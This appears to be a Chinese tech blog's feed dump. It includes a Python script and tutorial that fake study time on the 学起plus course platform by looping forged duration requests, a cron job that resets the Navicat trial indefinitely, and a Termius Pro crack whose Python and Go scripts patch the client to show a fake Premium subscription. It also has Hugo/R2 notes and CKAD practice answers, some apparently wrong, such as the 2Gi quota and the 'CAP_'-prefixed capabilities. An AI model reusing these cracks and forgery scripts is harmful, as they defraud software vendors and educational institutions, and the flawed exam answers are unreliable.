                
                for i, course in enumerate(courses[:5], 1):  # 只显示前5门
                    print(f"\n[{i}] {course.get('versionName', 'N/A')}")
                    print(f"    courseVersionID: {course.get('courseVersionID', 'N/A')}")
                    print(f"    teachplanCourseVersionId: {course.get('teachplanCourseVersionId', 'N/A')}")
                    print(f"    sign: {course.get('sign', 'N/A')}")
                    print(f"    学习进度: {course.get('coursewareLearningProgress', 'N/A')}")
                
                return courses
            else:
                print("未找到课程数据")
                return []
        except Exception as e:
            print(f"解析课程列表失败: {e}")
            print(f"响应内容: {response.text[:500]}")
            return []
    else:
        print(f"请求失败: {response.text}")
        return []


def send_study_duration_request(config):
    """发送学习时长记录请求"""
    headers = create_api_headers(
        content_type="application/json",
        extra_headers={
            "Host": "swfucce.sccchina.net",
            "Accept": "application/json",
            "eduRefUrl": config["edurefurl"],
        }
    )
    
    # 手动构建JSON数据，确保没有多余空格
    data_string = json.dumps({"data": config["data"]}, separators=(',', ':'))
    
    response = session.post(
        url=f"{BASE_URL}/student/student/coursestudyrecord/adddurationpc",
        headers=headers,
        data=data_string
    )
    return response

def build_study_config_from_course(course):
    """从课程信息构建学习配置"""
    course_version_id = course.get('courseVersionID')
    teachplan_course_version_id = course.get('teachplanCourseVersionId')
    sign = course.get('sign')
    version_name = course.get('versionName', '')
    
    if not all([course_version_id, teachplan_course_version_id, sign]):
        print(f"警告: 课程 {version_name} 缺少必要参数")
        return None
    
    # 验证必要的全局参数
    if not user_account_id:
        print("错误: user_account_id 未获取")
        return None
    
    # 构建edurefurl
    from urllib.parse import quote
    edurefurl = (f"{BASE_URL}/student/videolearning.html#Subpage/StudentVersionVideo?"
                 f"courseVersionId={course_version_id}&"
                 f"teachplanCourseVersionId={teachplan_course_version_id}&"
                 f"sign={sign}&"
                 f"userAccountId={user_account_id}&"
                 f"syncPracticePiwik=1&"
                 f"piwikSiteId=750&"
                 f"versionName={quote(version_name)}")
    
    # 构建token（这个需要从视频播放页面获取，这里使用时间戳生成临时token）
    # 实际使用时可能需要从 /student/student/coursestudyrecord/getvideotoken 等接口获取
    import hashlib
    timestamp = str(int(time.time() * 1000))
    token_str = f"{course_version_id}_{timestamp}_{user_account_id}"
    token_hash = hashlib.md5(token_str.encode()).hexdigest()
    token = f"{token_hash}|{timestamp}"
    
    config = {
        "edurefurl": edurefurl,
        "edutoken": edu_token or "placeholder",
        "edusign": "placeholder",  # eduSign可能需要额外获取
        "data": {
            "courseVersionId": str(course_version_id),
            "studyDuration": 30,
            "token": token,
        },
    }
    
    return config


def main():
    """主函数"""
    print("\n" + "#"*60)
    print("# 自动化学习系统")
    print("#"*60 + "\n")
    
    # 第一步：登录
    login_success = login()
    
    if not login_success:
        print("\n登录失败，程序退出")
        return
    
    # 第二步：获取课程列表
    courses = get_course_list()
    
    if not courses:
        print("\n未获取到课程列表，程序退出")
        return
    
    # 第三步：构建学习配置并发送请求
    print("\n" + "="*50)
    print("开始模拟学习...")
    print("="*50)
    
    # 使用前4门课程作为示例
    study_courses = courses[:4]
    
    while True:
        for course in study_courses:
            course_name = course.get('versionName', 'Unknown')
            print(f"\n>>> 正在学习: {course_name}")
            
            config = build_study_config_from_course(course)
            
            if config:
                try:
                    response = send_study_duration_request(config)
                    print(f"    状态码: {response.status_code}")
                    print(f"    响应: {response.text}")
                except Exception as e:
                    print(f"    请求失败: {e}")
            else:
                print(f"    跳过: 无法构建配置")
            
            # 短暂延迟
            time.sleep(2)
        
        print("\n" + "-"*50)
        print(f"本轮完成，等待30秒后继续...")
        print("-"*50)
        time.sleep(30)


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("\n\n程序被用户中断")
    except Exception as e:
        print(f"\n程序异常: {e}")
        import traceback
        traceback.print_exc()

]]> tools 学起plus 刷课学起自动化学习 Hugo vscode 自动上传图片到cloudflare //archives/hugo-vscode-auto-upload-file-to-oss-r2.html 在masrkdown中引用图片，有这么几种

![图片描述](图片url,可以为本地或者远程图片)

# 1. 相对路径
![图片描述](image.png)
![图片描述](./image.png)

# 2. 项目目录绝对路径
![图片描述](/static/logo/image.png) 

# 3. 外部引用
![图片描述](http://example.com/logo/image.png)

经过hugo 渲染后，图片路径错误

相对路径
在markdown中为 image.png 或./images.png , 发布站点后图片地址为 https:/xxx.xxx.xx/image.png , 图片会在域名下一级路径，导致图片无法查看

.
├── image.png
└── my-post
    └── index.html

绝对路径
关键字 /static 会在编译后省略，也就是static里面的所有文件包括子目录会复制到 public下，也是在一级路径下，去掉了static也会导致图片无法查看

## 编译前
.
└── static
    └── logo
        └── avatar.png

## 编译后
public  # 网站目录
└── logo # 一级目录
    └── avatar.png

如果只是本地查看还好，如果发布，需要手动或者单独写脚本处理。所以这里考虑使用对象存储来对图片进行存储，这样即使编译后，也可以保证图片正常。

对象存储有很多，国内阿里云，腾讯云，七牛云等，因为我的站点在cloudflare, 本着一站式服务，所以我使用了 cloudflare 的 R2 来存储图片等， cloudflare免费版有10G存储空间， 10G/月流量，个人站点，完全够用了，还可以方便的绑定域名，使用cdn

我使用的工具：

编辑器： vscode
扩展 markdown image
cloudflare账号

步骤如下图：

cloudflare部分

注册cloudflare 步骤省略
创建存储桶
设置自定义域名
如果域名已经托管到 cloudflare,直接输入一个二级域名即可， cloudflare会自动解析绑定
获取s3 apikey ，存储桶名， endpoint接入地址

到R2页面找到对应的存储桶信息

我们这里有几个基本信息
S3的endpoint： https://xxxxxxxxxxxxxxxxxx.r2.cloudflarestorage.com/uploads
存储桶名称：uploads
自定义域名（非必须）： uploads.xxx.com
S3 访问ID： xxxx
S3 密钥：  xxxxxx

vscode部分

安装扩展 markdown image
配置 markdown image
根据需要填写存储桶中的路径，
使用自动上传
打开markdown文件，切入到编辑模式
截屏或者复制图片，右键粘贴，然后按下 Ctrl + Shift + V 键粘贴图片即可

]]> cloudflare cloudflare 自动上传图片纯真IP数据库 /archives/tools/cz88.html IP地址位置数据由 https://www.cz88.net 纯真CZ88 提供支持

纯真(CZ88.NET)自2005年起一直为广大社区用户提供社区版IP地址库，只要获得纯真的授权就能免费使用，并不断获取后续更新的版本。如果有需要免费版IP库的朋友可以前往纯真的官网进行申请。
纯真除了免费的社区版IP库外，还提供数据更加准确、服务更加周全的商业版IP地址查询数据。

纯真围绕IP地址，基于网络空间拓扑测绘 + 移动位置大数据方案，对IP地址定位、IP网络风险、IP使用场景、IP网络类型、秒拨侦测、VPN侦测、代理侦测、爬虫侦测、真人度等均有近20年丰富的数据沉淀。

]]> tools 免费ip库学起plus python刷课脚本 /archives/tools/educloud-plus-shuake.html

文章主要通过分析浏览器请求，模拟浏览器请求来实现

分析浏览器网络请求

登陆后，进入课程学习页面，通过抓包或者F12 查看网站的连接情况，这里以学起plus 举例

进入课程学习页面，按F12观察网络情况，在不播放的情况下，浏览器过30秒会自动请求，找到两个请求如图

educloud-plus-shuake-0

可以看到请求为POST，

educloud-plus-shuake-1

浏览器自己每隔30秒会发送一个30秒的时间到服务器

educloud-plus-shuake-2
educloud-plus-shuake-3

根据请求编写python脚本

左侧框内为课程相关的信息和token/cookies之类信息，根据实际情况取用

所有我们需要模拟浏览器的请求，因为学习的课程比较少，就4个，就用简单的方式去实现，重复发送这几个请求

下面使用python来实现

import requests
import time

# 通用的请求头部分，对所有请求相同，相关参数可以参考上面的图片进行查找
headers = {
    "Host": "网站域名，例如 xxx.xxx.net",
    "Cookie": ".CHINAEDUCLOUD=coookis 参考图片，根据实际情况填写",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36",
    "Eduuid": "参考图片，根据实际情况填写",
    "Content-Type": "application/json",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "zh-CN,zh;q=0.9",
    "Connection": "close",
}

# 不同请求的数据配置可以到student/student/coursestudyrecord/adddurationpc请求中查找
requests_configs = [
    {
        "edurefurl": "https://aaa.bbb.net/student/videolearning.html#Subpage/StudentVersionVideo?courseVersionId=aaaaaaaaaaaaaaaa&teachplanCourseVersionId=dddddddddddd&sign=eeeeeeeeeeeeee&userAccountId=fffffffffffffffff",
        "edutoken": "xxxxx",
        "edusign": "hhhhhhhhhhhhhhhhhhh",
        "data": {
            "courseVersionId": "aaaaaaaaaaaaaaaa",
            "studyDuration": 30,
            "token": "bbbbbbbbbbbbbbbb|cccccccccccccccc",
        },
    },

  {
    #参照上面的结构，这里添加其他课程信息
  }，
]

def send_request(config):
    # 构建请求头部，加入特定的字段
    specific_headers = {
        "Edurefurl": config["edurefurl"],
        "Edutoken": config["edutoken"],
        "Edusign": config["edusign"],
    }
    combined_headers = {**headers, **specific_headers}
  
    # 发送请求
    response = requests.post(
        url="https://aaa.bbb.net/student/student/coursestudyrecord/adddurationpc",
        headers=combined_headers,
        json={"data": config["data"]},
    )
    return response

# 每30秒循环发送请求
while True:
    for config in requests_configs:
        response = send_request(config)
        print(f"Response Status: {response.status_code}, Response Text: {response.text}")
    time.sleep(30)

运行程序

python main.py

查看结果

如果不是200，请检查请求参数是否正确

educloud-plus-shuake-4

制作docker镜像

如此，就在自动刷课了，难道一直开着电脑，NO

制作成DOCKER镜像，然后随便丢一台一直开机的服务器跑即可

dockerfile 文件

#Dockerfile
FROM python:3.10.14-bookworm
WORKDIR /app
COPY main.py /app/
COPY requirements.txt /app/
RUN pip install requests 
CMD ["python","-u", "main.py"]

制作镜像

docker build -t tag标签 .
docker push tag

使用镜像

docker run -d --name shuake tag标签

查看日志

docker logs -f shuake

educloud-plus-shuake-5

]]> tools python 学起plus 刷课 Linux 无限试用navicat /archives/tools/navicat-trial.html 删除 .config/navicat

rm -rf ~/.config/navicat/Premium

删除 .config/dconf/user 文件中navicat对应的键值项

不能直接删除 ~/.config/dconf/user 因为这个文件存着用户其他配置，如果无所谓可以删除

所以更安全的方法是通过编辑dconf文件来进行，可以通过安装 dconf-editor 或者使用 dconf命令

安装dconf-editor

sudo apt update
sudo apt install dconf-editor

使用 dconf-editor 命令即可打开dconf文件进行查看或者编辑

dconf-editor

我们需要做的就是删除 premiumsoft

navicat-trial-0

右键 循环重设 即可

使用命令更为方便，上面的主要是为了可视化查看

使用dconf命令删除 navicat dconf中配置

dconf reset -f /com/premiumsoft/

通过计划任务自动删除配置文件

0 9 */14 * * rm -rf ~/.config/navicat/Premium && dconf reset -f /com/premiumsoft/

手动执行

rm -rf ~/.config/navicat/Premium && dconf reset -f /com/premiumsoft/

]]> tools navicat 通过WARP隐藏IP /archives/tools/WARP-cli.html warp是什么？ Cloudflare Warp 是由 Cloudflare 提供的一项网络优化服务，旨在提供更快速、更安全的互联网体验。它通过在全球范围内部署的服务器网络来加密并加速用户的网络流量。

Warp 应用程序：适用于移动设备（iOS 和 Android），安装后可以在手机或平板电脑上使用，以提升移动数据和 Wi-Fi 连接的性能和安全性。
Warp+：是 Warp 的付费版本，除了基本的网络优化功能外，还承诺提供更快的速度，并优先处理用户的数据包，减少延迟和提高加载速度。
Warp 代理（如 warp-cli）：为开发者和高级用户提供命令行工具，可以在服务器和其他支持的平台上配置和使用 Warp 服务。

有时候还可以作为梯子使用～～

官网 https://1.1.1.1/

检查是否开启warp https://cloudflare.com/cdn-cgi/trace 找到 warp=***，如果为 warp=off，则代表未开启或未代理，如果为 warp=plus 则代表启用成功，当前网络由 WARP+ 托管，所有网络请求流量通过 WARP+ VPN 转发

...
tls=TLSv1.3
sni=plaintext
warp=plus
...

使用warp 一般我们分为以下几个步骤

安装cloudflare-warp

linux参考 https://developers.cloudflare.com/warp-client/get-started/linux/

debian/ubuntu

#添加gpg key
curl -fsSL https://pkg.cloudflareclient.com/pubkey.gpg | sudo gpg --yes --dearmor --output /usr/share/keyrings/cloudflare-warp-archive-keyring.gpg

#添加apt源
echo "deb [signed-by=/usr/share/keyrings/cloudflare-warp-archive-keyring.gpg] https://pkg.cloudflareclient.com/ $(lsb_release -cs) main" | sudo tee /etc/apt/sources.list.d/cloudflare-client.list

#安装
sudo apt-get update && sudo apt-get install cloudflare-warp

使用

使用licensekey来连接，不限流量

#第一次使用
warp-cli registration new
warp-cli registration license xxxxxxxxx-7xxxxm6-xxxxxxxx
warp-cli connect

#以后使用connect即可
warp-cli connect
warp-cli disconnect

lisence key获取方法

通过电报机器人获取 https://t.me/generatewarpplusbot

关注以后输入/start 会有提示，然后依次点击提示按钮即可，最后输入/generate <提示的简单加减法的值>

WARP-cli-0

/start
/generate xx

]]> tools WARP Termius pro 通用破解 < 8.12 /archives/tools/Termius-pro-crack-lt-8.12.html

注意：这里不是破解Termius服务器，而是破解一些本地termius的功能，比如隧道跳板机等，xshell也有类似功能，但是xshell没有linux客户端，

参考

https://github.com/h3110w0r1d-y/termius-cracked

https://www.52pojie.cn/thread-1860682-1-1.html

8.11.0下载地址

版本8.12以后有变更不支持，适用8.11.0及之前版本

git clone https://aur.archlinux.org/v.git

这里提供一下termius 8.11.0的snap地址

https://api.snapcraft.io/api/v1/snaps/download/WkTBXwoX81rBe3s3OTt3EiiLKBx2QhuS_186.snap

只需要termius 8.11.0 的asar文件可以从这里下载，下载后改名为 app.asar即可
不需要解压 不需要解压 不需要解压

https://images.hao.kim/uploads/app.asar-8.11.0.zip

构建文件

https://aur.archlinux.org/cgit/aur.git/tree/PKGBUILD?h=termius

安装squashfs

sudo apt update
sudo apt install squashfs-tools
#解压snap文件
mkdir extracted_snap
unsquashfs -d extracted_snap/ WkTBXwoX81rBe3s3OTt3EiiLKBx2QhuS_186.snap

安装npm，asar

#这里为ubuntu或者debian
# centos使用yum -y install npm
sudo apt -y install npm

sudo npm config set registry https://registry.npmmirror.com --global
sudo npm install -g asar

解压app.asar

linux版的目录为 /opt/Termius/resources
Mac版的目录为 /Applications/Termius.app/Contents/Resources/
Windows 目录为 C:\Users\Administrator\AppData\Local\Programs\Termius\resources

cd /opt/Termius/resources
sudo asar extract app.asar ./app  # 修改完不需要重新打包
sudo mv app.asar app.asar.bak  # 留个备份，或者直接rm
sudo rm app-update.yml  # 防止自动更新,这个文件不一定有

修改app/js/background-process.js

搜索

await this.api.bulkAccount

将下面的进行替换

const e=await this.api.bulkAccount();

修改为

var e=await this.api.bulkAccount();
e.account.pro_mode=true;
e.account.need_to_update_subscription=false;
e.account.current_period={
    "from": "2022-01-01T00:00:00",
    "until": "2099-01-01T00:00:00"
};
e.account.plan_type="Premium";
e.account.user_type="Premium";
e.student=null;
e.trial=null;
e.account.authorized_features.show_trial_section=false;
e.account.authorized_features.show_subscription_section=true;
e.account.authorized_features.show_github_account_section=false;
e.account.expired_screen_type=null;
e.personal_subscription={
    "now": new Date().toISOString().slice(0, -5),
    "status": "SUCCESS",
    "platform": "stripe",
    "current_period": {
        "from": "2022-01-01T00:00:00",
        "until": "2099-01-01T00:00:00"
    },
    "revokable": true,
    "refunded": false,
    "cancelable": true,
    "reactivatable": false,
    "currency": "usd",
    "created_at": "2022-01-01T00:00:00",
    "updated_at": new Date().toISOString().slice(0, -5),
    "valid_until": "2099-01-01T00:00:00",
    "auto_renew": true,
    "price": 12.0,
    "verbose_plan_name": "Termius Pro Monthly",
    "plan_type": "SINGLE",
    "is_expired": false
};
e.access_objects=[{
    "period": {
        "start": "2022-01-01T00:00:00",
        "end": "2099-01-01T00:00:00"
    },
    "title": "Pro"
}];

Termius-pro-crack-lt-8.12-0

保存文件，重新打开Termius 即可， pro功能即可使用，

破解脚本

Python版本

import re

# 要替换的原文本（可能需要调整正则表达式以精确匹配）
pattern = re.compile(r'const e=await this\.api\.bulkAccount\(\);', re.DOTALL)

# 新的文本内容
replacement = """
var e=await this.api.bulkAccount();
e.account.pro_mode=true;
e.account.need_to_update_subscription=false;
e.account.current_period={
    "from": "2022-01-01T00:00:00",
    "until": "2099-01-01T00:00:00"
};
e.account.plan_type="Premium";
e.account.user_type="Premium";
e.student=null;
e.trial=null;
e.account.authorized_features.show_trial_section=false;
e.account.authorized_features.show_subscription_section=true;
e.account.authorized_features.show_github_account_section=false;
e.account.expired_screen_type=null;
e.personal_subscription={
    "now": new Date().toISOString().slice(0, -5),
    "status": "SUCCESS",
    "platform": "stripe",
    "current_period": {
        "from": "2022-01-01T00:00:00",
        "until": "2099-01-01T00:00:00"
    },
    "revokable": true,
    "refunded": false,
    "cancelable": true,
    "reactivatable": false,
    "currency": "usd",
    "created_at": "2022-01-01T00:00:00",
    "updated_at": new Date().toISOString().slice(0, -5),
    "valid_until": "2099-01-01T00:00:00",
    "auto_renew": true,
    "price": 12.0,
    "verbose_plan_name": "Termius Pro Monthly",
    "plan_type": "SINGLE",
    "is_expired": false
};
e.access_objects=[{
    "period": {
        "start": "2022-01-01T00:00:00",
        "end": "2099-01-01T00:00:00"
    },
    "title": "Pro"
}];
"""

# 文件路径
file_path = '/opt/Termius/resources/app/js/background-process.js'

# 读取文件
with open(file_path, 'r', encoding='utf-8') as file:
    content = file.read()

# 替换文本
new_content = re.sub(pattern, replacement, content)

# 写回文件
with open(file_path, 'w', encoding='utf-8') as file:
    file.write(new_content)

print("替换完成。")

GO版本

src.js

const e=await this.api.bulkAccount();

dst.js

var e=await this.api.bulkAccount();
e.account.pro_mode=true;
e.account.need_to_update_subscription=false;
e.account.current_period={
    "from": "2022-01-01T00:00:00",
    "until": "2099-01-01T00:00:00"
};
e.account.plan_type="Premium";
e.account.user_type="Premium";
e.student=null;
e.trial=null;
e.account.authorized_features.show_trial_section=false;
e.account.authorized_features.show_subscription_section=true;
e.account.authorized_features.show_github_account_section=false;
e.account.expired_screen_type=null;
e.personal_subscription={
    "now": new Date().toISOString().slice(0, -5),
    "status": "SUCCESS",
    "platform": "stripe",
    "current_period": {
        "from": "2022-01-01T00:00:00",
        "until": "2099-01-01T00:00:00"
    },
    "revokable": true,
    "refunded": false,
    "cancelable": true,
    "reactivatable": false,
    "currency": "usd",
    "created_at": "2022-01-01T00:00:00",
    "updated_at": new Date().toISOString().slice(0, -5),
    "valid_until": "2099-01-01T00:00:00",
    "auto_renew": true,
    "price": 12.0,
    "verbose_plan_name": "Termius Pro Monthly",
    "plan_type": "SINGLE",
    "is_expired": false
};
e.access_objects=[{
    "period": {
        "start": "2022-01-01T00:00:00",
        "end": "2099-01-01T00:00:00"
    },
    "title": "Pro"
}];

crack.go

package main

import (
    "fmt"
    "log"
    "os"
    "regexp"
)

func main() {
    // 读取要替换的文本和替换文本
    originalText, err := os.ReadFile("src.js")
    if err != nil {
        log.Fatalf("failed reading file: %s", err)
    }
    replacementText, err := os.ReadFile("dst.js")
    if err != nil {
        log.Fatalf("failed reading file: %s", err)
    }

    // 读取目标文件
    targetFileContent, err := os.ReadFile("/opt/Termius/resources/app/js/background-process.js")
    if err != nil {
        log.Fatalf("failed reading file: %s", err)
    }

    // 使用regexp进行替换
    // 注意：这里的正则表达式需要根据实际文本进行调整
    re := regexp.MustCompile(`(?s)` + regexp.QuoteMeta(string(originalText)))
    replacedContent := re.ReplaceAll(targetFileContent, replacementText)

    // 将替换后的内容写回文件
    if err := os.WriteFile("/opt/Termius/resources/app/js/background-process.js", replacedContent, 0666); err != nil {
        log.Fatalf("failed writing to file: %s", err)
    }

    fmt.Println("替换完成。")
}

]]> tools Termius pro 8.12 CKAD 模拟题库 | 28. Jobs /archives/kubernetes/CKAD/Jobs.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

用执行命令 date; echo Hello from the Kubernetes cluster 的镜像 busybox ，创建一个名为 busybox-job 的 Job 。
修改此 Job ，确保在执行时间超过 3000 秒后，kubernetes 会自动终止该 Job。
如果容器失败，则尝试重启容器，但最多尝试重启 5 次。
检查此Job的日志

参考

https://kubernetes.io/zh-cn/docs/concepts/workloads/controllers/job/#job-termination-and-cleanup

kubectl explain job.spec

解答

切换环境

kubectl config use-context k8s

创建job模板

kubectl create job  busybox-job --image busybox --dry-run=client -oyaml > 28.yaml

编辑

apiVersion: batch/v1
kind: Job
metadata:
  creationTimestamp: null
  name: busybox-job
spec:
  backoffLimit: 5  #失败次数限制
  activeDeadlineSeconds: 3000 #存活时间s
  template:
    metadata:
      creationTimestamp: null
    spec:
      containers:
      - image: busybox #镜像
        name: busybox-job
        command: # 命令模板
        - /bin/sh
        - -c
        - date; echo Hello from the Kubernetes cluster #执行的命令
      restartPolicy: OnFailure #题目要求的重启策略

应用

kubectl apply -f 28.yaml

检查

kubectl get jobs busybox-job
kubectl get pod
kubectl logs busybox-job-rljjz

Jobs-0

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 27. Secret 秘钥 /archives/kubernetes/CKAD/Secret-2.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

在 test 命名空间，创建一个名为 mysecret 的密钥，其值 username 为 devuser 和 password为A!B*d$zDsb= 在 test 命名空间，创建一个 pod，镜像使用 nginx:1.16 ，名字为 mypod ，将秘密 mysecret 挂载到路径 /etc/foo 上的卷中

参考

https://kubernetes.io/zh-cn/docs/tasks/configmap-secret/managing-secret-using-kubectl/
https://kubernetes.io/zh-cn/docs/concepts/configuration/secret/#using-secrets-as-files-from-a-pod

解答

切换环境

kubectl config use-context k8s

创建secret

echo -n 'devuser' > ./username.txt
echo -n 'A!B\*d$zDsb=' > ./password.txt
kubectl create secret generic mysecret \
    --from-file=./username.txt \
    --from-file=./password.txt

或者

kubectl -n test create secret generic mysecret \
    --from-literal=username=devuser \
    --from-literal=password='A!B\*d$zDsb='

创建pod,并挂载secret

apiVersion: v1
kind: Pod
metadata:
  name: mypod
  namespace: test
spec:
  volumes:
  - name: mysecret-volume
    secret:
      secretName: mysecret
  containers:
  - name: mypod
    image: nginx:1.16
    volumeMounts:
    - name: mysecret-volume
      readOnly: true
      mountPath: "/etc/foo"

创建并检查

kubectl apply -f pod.yaml
kubectl -n test exec -it pods/mypod -- ls /etc/foo
kubectl -n test exec -it pods/mypod -- cat /etc/foo/username

Secret-2-0

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 26. SecurityContext 安全上下文 /archives/kubernetes/CKAD/securityContext-2.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

在 test 命名空间，有一个名为 secnginx 的 pod，修改此 pod，为容器添加CAP_NET_ADMIN 和 CAP_SYS_TIME 权能

参考

https://kubernetes.io/zh-cn/docs/tasks/configure-pod-container/security-context/#set-capabilities-for-a-container

apiVersion: v1
kind: Pod
metadata:
  name: security-context-demo-4
spec:
  containers:
  - name: sec-ctx-4
    image: gcr.io/google-samples/node-hello:1.0
    securityContext:
      capabilities:
        add: ["NET_ADMIN", "SYS_TIME"]

解答

切换环境

kubectl config use-context k8s

通过模板修改现在运行pod的权限后重建

kubectl -n test get pod secnginx -oyaml > secnginx.yaml
cp secnginx.yaml secnginx.yaml-bak
kubectl delete -f secnginx.yaml

编辑yaml文件添加

vim secnginx.yaml

securityContext:
  capabilities:
    add: ["CAP_NET_ADMIN","CAP_SYS_TIME"]

securityContext-2-0

创建pod

kubectl apply -f secnginx.yaml

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 25. 资源配额Quota /archives/kubernetes/CKAD/quota.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

在 qutt 命名空间，创建一个名为 myquota 的 Quota，该资源 Quota 具有 1 个CPU， 1G 内存和 2个 pod的硬限制。

参考

https://kubernetes.io/zh-cn/docs/concepts/policy/resource-quotas/#viewing-and-setting-quotas

apiVersion: v1
kind: ResourceQuota
metadata:
  name: pods-medium
spec:
  hard:
    cpu: "10"
    memory: 20Gi
    pods: "10"

解答

切换环境

kubectl config use-context k8s

创建quota

vim quota.yaml

apiVersion: v1
kind: ResourceQuota
metadata:
  name: myquota 
  namespace: qutt
spec:
  hard:
    cpu: "1"
    memory: 2Gi
    pods: "2"

应用

kubectl apply -f quota.yaml

检查

kubectl -n qutt get quota

quota-0

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 24. sidecar 边车容器 /archives/kubernetes/CKAD/sidecar.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

在 default 命名空间创建一个 deployment 名为 deploymenb-web
包含一个主容器 lfccncf/busybox:1 ，名称 logger-123
包含一个边车容器 lfccncf/fluentd:v0.12 ，名称 adaptor-dev
在两个容器上挂载一个共享卷 /ckad/log ,当 pod 删除 ，这个卷 不会持久 。
在 logger-123 容器运行以下命令：
while true; do
echo "i luv cncf" >> /ckad/log/input.log; sleep 10;
done
结果会文本输出到 /ckad/log/input.log ，格式示例如下： i luv cncf i luv cncf i luv cncf
adaptor-dev 容器读取 /ckad/log/input.log ，并将数据输出到 /ckad/log/output.* 格式为 Fluentd JSON
请注意：完成此任务不需要了解 Fluentd ，完成此任务所需要的知识 . 从/ckad/KDMC00102/fluentd-configmap.yaml 提供规范文件中创建 configmap ，并将该 configmap 挂载到边车容器 adapter-dev 中的 /fluentd/etc

参考

https://kubernetes.io/zh-cn/docs/concepts/cluster-administration/logging/

apiVersion: v1
kind: Pod
metadata:
  name: counter
spec:
  containers:
  - name: count
    image: busybox:1.28
    args:
    - /bin/sh
    - -c
    - >
      i=0;
      while true;
      do
        echo "$i: $(date)" >> /var/log/1.log;
        echo "$(date) INFO $i" >> /var/log/2.log;
        i=$((i+1));
        sleep 1;
      done    
    volumeMounts:
    - name: varlog
      mountPath: /var/log
  - name: count-log-1
    image: busybox:1.28
    args: [/bin/sh, -c, 'tail -n+1 -F /var/log/1.log']
    volumeMounts:
    - name: varlog
      mountPath: /var/log
  - name: count-log-2
    image: busybox:1.28
    args: [/bin/sh, -c, 'tail -n+1 -F /var/log/2.log']
    volumeMounts:
    - name: varlog
      mountPath: /var/log
  volumes:
  - name: varlog
    emptyDir: {}

解答

切换环境

kubectl config use-context k8s

编辑fluentdyaml文件,考试时一般是正确的不需要修改

cp /ckad/KDMC00102/fluentd-configmap.yaml fluentd-configmap.yaml.bak
vim fluentd-configmap.yaml

apiVersion: v1
kind: ConfigMap
metadata:
  name: fluentd-config
data:
  fluent.conf: |
  
      @type tail
      format none
      path /ckad/log/input.log #修改
      tag cncf #修改
    
        @type none
    
  
     #修改
      @type file
      path /ckad/log/output #修改

应用

kubectl apply -f fluentd-configmap.yaml

创建sidecar yaml文件

apiVersion: apps/v1
kind: Deployment
metadata:
  name:  deploymend-web
  namespace: default
  labels:
    app:  deploymend-web
spec:
  selector:
    matchLabels:
      app: nginx
  replicas: 1
  template:
    metadata:
      labels:
        app:  nginx
    spec:
      containers:
      - image:  lfccncf/busybox:1 
        name:  logger-123
        args:
        - /bin/sh
        - -c
        - >
          while true; do
            echo "i luv cncf" >> /ckad/log/input.log; sleep 10;
          done
        volumeMounts:
        - name: log
          mountPath: /ckad/log
      - image:   lfccncf/fluentd:v0.12
        name:  adaptor-dev
        volumeMounts:
        - name: log
          mountPath: /ckad/log
        - name: config
          mountPath: /fluentd/etc
      volumes:
      - name: log
        emptyDir: {}
      - name: config 
        configMap:
          name: fluentd-config

应用

kubectl apply -f sidecar.yaml

检查

kubectl get deployments,pod
kubectl exec deploymend-web-cfbccb8c7-xts4f -c adaptor-dev -- tail /ckad/log/input.log

sidecar-0

]]> kubernetes CKAD K8s Killer.sh CKAD CKAD 模拟题库 | 23. PV/PVC 的使用 /archives/kubernetes/CKAD/pv-pvc.html 模拟题目

设置配置环境：

[candidate@node-1] $ kubectl config use-context k8s

Task

在 node02 节点上创建一个文件 /opt/KDSP00101/data/index.html ,内容为 WEPKEY=7789
使用 hostPath 创建一个名为 task-pv-volume 的 PersistentVolume ，并分配 2Gi 容量，指定该卷位于集群节点上的 /opt/KDSP00101/data ，访问模式 ReadWriteOnce 。它应该为 PersistentVolume 定义 StorageClass 名称为 keys ，它将被用来绑定 PersistentVolumeClaim 请求到这个 PersistenetVolume 。
创建一个名为 task-pv-claim 的 PersistentVolumeClaim ，请求容量 200Mi ，并指定访问模式 ReadWriteOnce
创建一个 pod，使用 PersistentVolmeClaim 作为一个卷，带有一个标签 app:my-storage-app ，将卷挂载到 pod 内的 /usr/share/nginx/html

参考

https://kubernetes.io/zh-cn/docs/tasks/configure-pod-container/configure-persistent-volume-storage/

apiVersion: v1
kind: PersistentVolume
metadata:
  name: task-pv-volume
  labels:
    type: local
spec:
  storageClassName: manual
  capacity:
    storage: 10Gi
  accessModes:
    - ReadWriteOnce
  hostPath:
    path: "/mnt/data"

解答

切换环境

kubectl config use-context k8s

1. 远程到node02 并写入文件

ssh node02
echo "WEPKEY=7789" > /opt/KDSP00101/data/index.html

2. 使用官网模板创建一个pv

pv.yaml

#pv.yaml
apiVersion: v1
kind: PersistentVolume
metadata:
  name: task-pv-volume #根据题目要求修改
  labels:
    type: local
spec:
  storageClassName: keys #题目要求keys
  capacity:
    storage: 2Gi #题目要求2Gi
  accessModes:
    - ReadWriteOnce # 题目要求
  hostPath:
    path: "/opt/KDSP00101/data" #题目要求路径

创建

kubectl apply -f pv.yaml

3. 创建pv-claim

pv-claim.yaml

apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: task-pv-claim
spec:
  storageClassName: keys #根据题目要求
  accessModes:
    - ReadWriteOnce
  resources:
    requests:
      storage: 200Mi #根据题目要求

创建pvc

kubectl apply -f pv-claim.yaml

4. 创建pod

考试时, 检查是否有多个node, 如果有多个节点, 则需要指定nodeSelector, 让pod和pv所在一个节点 pod-pv.yaml

apiVersion: v1
kind: Pod
metadata:
  name: task-pv-pod
  labels: #添加
    app: my-storage-app # 按题目要求添加
spec:
  nodeSelector:
    kubernetes.io/hostname: node02 #kubectl get nodes --show-labels获取到的标签
  volumes:
    - name: task-pv-storage
      persistentVolumeClaim:
        claimName: task-pv-claim #pvc名
  containers:
    - name: task-pv-container
      image: nginx
